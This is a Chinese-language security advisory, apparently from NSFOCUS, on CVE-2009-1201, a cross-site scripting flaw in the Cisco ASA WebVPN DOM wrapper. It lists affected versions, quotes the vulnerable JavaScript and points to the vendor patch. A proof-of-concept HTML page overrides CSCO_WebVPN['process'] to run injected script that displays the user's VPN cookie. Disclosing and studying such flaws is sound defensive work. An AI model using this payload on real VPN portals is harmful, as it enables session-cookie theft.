安全研究

安全漏洞
Cisco ASA设备WebVPN DOM Wrapper跨站脚本漏洞

发布日期:2009-06-24
更新日期:2009-06-25

受影响系统:
Cisco ASA 8.2.1
Cisco ASA 8.1.2
Cisco ASA 8.0(4)
不受影响系统:
Cisco ASA 8.1.2.25
Cisco ASA 8.0.4.34
描述:
BUGTRAQ  ID: 35476
CVE(CAN) ID: CVE-2009-1201

Cisco自适应安全设备(ASA)是可提供安全和VPN服务的模块化平台。

ASA的DOM wrapper中存在跨站脚本漏洞。/+CSCOL+/cte.js中的csco_wrap_js JavaScript函数调用了CSCO_WebVPN['process']所引用的函数,之后在eval语句中使用了调用的结果:

function csco_wrap_js(str)
{
   var ret="<script id=CSCO_GHOST src="+CSCO_Gateway+
           "/+CSCOL+/cte.js></scr"+
           "ipt><script id=CSCO_GHOST src="+
           CSCO_Gateway+"/+CSCOE+/apcf></sc"+"ript>";
   var js_mangled=CSCO_WebVPN['process']('js',str);
   ret+=CSCO_WebVPN['process']('html',eval(js_mangled));
   return ret;
};

恶意网页可以使用会返回任意值的攻击者定义函数重写CSCO_WebVPN['process'],在下一次调用csco_wrap_js函数的时候就会执行恶意代码。

<*来源:David Byrne (davidribyrne@yahoo.com
  
  链接:http://marc.info/?l=bugtraq&m=124586192309368&w=2
        http://secunia.com/advisories/35511/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<html><script>
function a(b, c)
{
   return "alert('Your VPN location:\\n\\n'+" +
   "document.location+'\\n\\n\\n\\n\\n" +
   "Your VPN cookie:\\n\\n'+document.cookie);";
}
CSCO_WebVPN['process'] = a;
csco_wrap_js('');
</script></html>

建议:
厂商补丁:

Cisco
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.cisco.com/pcgi-bin/tablebuild.pl/ASAPSIRT

浏览次数:2511
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障